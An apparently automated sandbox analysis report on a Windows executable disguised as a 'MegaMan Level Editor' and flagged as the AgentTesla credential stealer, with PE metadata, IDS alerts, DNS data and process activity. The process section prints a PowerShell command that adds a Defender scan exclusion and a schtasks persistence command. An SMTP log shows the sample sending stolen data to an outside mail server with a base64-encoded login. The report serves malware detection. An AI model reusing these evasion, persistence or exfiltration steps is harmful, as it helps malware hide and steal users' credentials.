                                                                                                              SHA1:6c41343a2e25f932f901e53e615cc083209f6a65
                                                                                                              SHA256:56960095ea2eda1c680f9df0937a792e9bca7af4922931540688097e6d2a43bb
                                                                                                              SHA512:4c343183ec50c6887b758ed1fa40478bc87a0944792944d42c9978ebda94b08a9d2e3e77b039963bf0a3ec2d5090bbb7fba9cf0486ebe8c00ac393a2361fce98
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4beeae
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x619F0842 [Thu Nov 25 03:51:30 2021 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ebp+0800000Eh], ch
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [3D3F170Ah], bh
                                                                                                              or dl, byte ptr [edi]
                                                                                                              aas
                                                                                                              cmp eax, 003F170Ah
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [esi-51C21EB9h], ch
                                                                                                              inc edi
                                                                                                              loope 00007F9600AD8B7Fh
                                                                                                              scasb
                                                                                                              inc edi
                                                                                                              loope 00007F9600AD8B7Fh
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              call far 9999h : 9A3E9999h
                                                                                                              call far 0000h : 003E9999h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbee5c0x4f.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x688.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000xbcf0c0xbd000False0.832854094329data7.79660930856IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xc00000x6880x800False0.3447265625data3.60442370225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xc20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_VERSION0xc00900x3f8data
                                                                                                              RT_MANIFEST0xc04980x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Version Infos

                                                                                                              DescriptionData
                                                                                                              Translation0x0000 0x04b0
                                                                                                              LegalCopyrightCopyright LiquidFyre Games, LLC 2009
                                                                                                              Assembly Version1.0.0.0
                                                                                                              InternalNameInternalApplicationIdentityHelp.exe
                                                                                                              FileVersion1.0.0.0
                                                                                                              CompanyNameLiquidFyre Games, LLC
                                                                                                              LegalTrademarks
                                                                                                              Comments
                                                                                                              ProductNameMegaMan Level Editor
                                                                                                              ProductVersion1.0.0.0
                                                                                                              FileDescriptionMegaMan Level Editor
                                                                                                              OriginalFilenameInternalApplicationIdentityHelp.exe

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              11/25/21-20:05:28.389248TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49833587192.168.2.4208.91.199.223
                                                                                                              11/25/21-20:05:31.967875TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49834587192.168.2.4208.91.199.224

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 25, 2021 20:05:27.043028116 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:27.192215919 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:27.194693089 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:27.469840050 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:27.470530033 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:27.620066881 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:27.620111942 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:27.621449947 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:27.771430969 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:27.771962881 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:27.923211098 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:27.924423933 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:28.074255943 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:28.074915886 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:28.237390041 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:28.238054991 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:28.387465000 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:28.389247894 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:28.389559031 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:28.390716076 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:28.390839100 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:28.539186954 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:28.539829969 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:28.640168905 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:28.692684889 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:29.978957891 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:30.130351067 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:30.130392075 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:30.130600929 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:30.130983114 CET49833587192.168.2.4208.91.199.223
                                                                                                              Nov 25, 2021 20:05:30.285567999 CET58749833208.91.199.223192.168.2.4
                                                                                                              Nov 25, 2021 20:05:30.618055105 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:30.769563913 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:30.770730019 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.060530901 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.061099052 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.210959911 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.211000919 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.211307049 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.359637976 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.360536098 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.507431030 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.507930994 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.659888029 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.660202980 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.820298910 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.820674896 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.965879917 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:31.967717886 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.967875004 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.967977047 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.968084097 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.968234062 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.968348026 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.968417883 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:31.968513966 CET49834587192.168.2.4208.91.199.224
                                                                                                              Nov 25, 2021 20:05:32.112729073 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:32.112773895 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:32.112977028 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:32.113014936 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:32.153162956 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:32.216402054 CET58749834208.91.199.224192.168.2.4
                                                                                                              Nov 25, 2021 20:05:32.271105051 CET49834587192.168.2.4208.91.199.224

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 25, 2021 20:05:26.861645937 CET5370053192.168.2.48.8.8.8
                                                                                                              Nov 25, 2021 20:05:26.906301975 CET53537008.8.8.8192.168.2.4
                                                                                                              Nov 25, 2021 20:05:30.558090925 CET5172653192.168.2.48.8.8.8
                                                                                                              Nov 25, 2021 20:05:30.615698099 CET53517268.8.8.8192.168.2.4

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Nov 25, 2021 20:05:26.861645937 CET192.168.2.48.8.8.80xe8baStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:30.558090925 CET192.168.2.48.8.8.80xc36Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Nov 25, 2021 20:05:26.906301975 CET8.8.8.8192.168.2.40xe8baNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:26.906301975 CET8.8.8.8192.168.2.40xe8baNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:26.906301975 CET8.8.8.8192.168.2.40xe8baNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:26.906301975 CET8.8.8.8192.168.2.40xe8baNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:30.615698099 CET8.8.8.8192.168.2.40xc36No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:30.615698099 CET8.8.8.8192.168.2.40xc36No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:30.615698099 CET8.8.8.8192.168.2.40xc36No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 20:05:30.615698099 CET8.8.8.8192.168.2.40xc36No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)

                                                                                                              SMTP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                              Nov 25, 2021 20:05:27.469840050 CET58749833208.91.199.223192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 20:05:27.470530033 CET49833587192.168.2.4208.91.199.223EHLO 287400
                                                                                                              Nov 25, 2021 20:05:27.620111942 CET58749833208.91.199.223192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 20:05:27.621449947 CET49833587192.168.2.4208.91.199.223AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 20:05:27.771430969 CET58749833208.91.199.223192.168.2.4334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 20:05:27.923211098 CET58749833208.91.199.223192.168.2.4235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 20:05:27.924423933 CET49833587192.168.2.4208.91.199.223MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 20:05:28.074255943 CET58749833208.91.199.223192.168.2.4250 2.1.0 Ok
                                                                                                              Nov 25, 2021 20:05:28.074915886 CET49833587192.168.2.4208.91.199.223RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 20:05:28.237390041 CET58749833208.91.199.223192.168.2.4250 2.1.5 Ok
                                                                                                              Nov 25, 2021 20:05:28.238054991 CET49833587192.168.2.4208.91.199.223DATA
                                                                                                              Nov 25, 2021 20:05:28.387465000 CET58749833208.91.199.223192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 20:05:28.390839100 CET49833587192.168.2.4208.91.199.223.
                                                                                                              Nov 25, 2021 20:05:28.640168905 CET58749833208.91.199.223192.168.2.4250 2.0.0 Ok: queued as 27BF1D9D9E
                                                                                                              Nov 25, 2021 20:05:29.978957891 CET49833587192.168.2.4208.91.199.223QUIT
                                                                                                              Nov 25, 2021 20:05:30.130351067 CET58749833208.91.199.223192.168.2.4221 2.0.0 Bye
                                                                                                              Nov 25, 2021 20:05:31.060530901 CET58749834208.91.199.224192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 20:05:31.061099052 CET49834587192.168.2.4208.91.199.224EHLO 287400
                                                                                                              Nov 25, 2021 20:05:31.211000919 CET58749834208.91.199.224192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 20:05:31.211307049 CET49834587192.168.2.4208.91.199.224AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 20:05:31.359637976 CET58749834208.91.199.224192.168.2.4334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 20:05:31.507431030 CET58749834208.91.199.224192.168.2.4235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 20:05:31.507930994 CET49834587192.168.2.4208.91.199.224MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 20:05:31.659888029 CET58749834208.91.199.224192.168.2.4250 2.1.0 Ok
                                                                                                              Nov 25, 2021 20:05:31.660202980 CET49834587192.168.2.4208.91.199.224RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 20:05:31.820298910 CET58749834208.91.199.224192.168.2.4250 2.1.5 Ok
                                                                                                              Nov 25, 2021 20:05:31.820674896 CET49834587192.168.2.4208.91.199.224DATA
                                                                                                              Nov 25, 2021 20:05:31.965879917 CET58749834208.91.199.224192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 20:05:31.968513966 CET49834587192.168.2.4208.91.199.224.
                                                                                                              Nov 25, 2021 20:05:32.216402054 CET58749834208.91.199.224192.168.2.4250 2.0.0 Ok: queued as B79533A1B2D

                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: 03SPwb995m.exe PID: 1364 Parent PID: 5272

                                                                                                              General

                                                                                                              Start time:20:03:31
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\03SPwb995m.exe"
                                                                                                              Imagebase:0x8f0000
                                                                                                              File size:777216 bytes
                                                                                                              MD5 hash:815982590DE5E574ABB8A0310826E200
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 5776 Parent PID: 1364

                                                                                                              General

                                                                                                              Start time:20:03:37
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Imagebase:0x3a0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 5560 Parent PID: 5776

                                                                                                              General

                                                                                                              Start time:20:03:37
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: schtasks.exe PID: 5732 Parent PID: 1364

                                                                                                              General

                                                                                                              Start time:20:03:37
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
                                                                                                              Imagebase:0xc30000
                                                                                                              File size:185856 bytes
                                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 5404 Parent PID: 5732

                                                                                                              General

                                                                                                              Start time:20:03:38
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: 03SPwb995m.exe PID: 5596 Parent PID: 1364

                                                                                                              General

                                                                                                              Start time:20:03:40
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              Imagebase:0x780000
                                                                                                              File size:777216 bytes
                                                                                                              MD5 hash:815982590DE5E574ABB8A0310826E200
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.674290952.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.674290952.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.675912617.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.675912617.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.674955731.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.674955731.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Analysis Process: 03SPwb995m.exe PID: 1364 Parent PID: 5272 03SPwb995m.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 02BBD250, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02BBD2B0
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BBD2ED
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02BBD32A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBD383
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
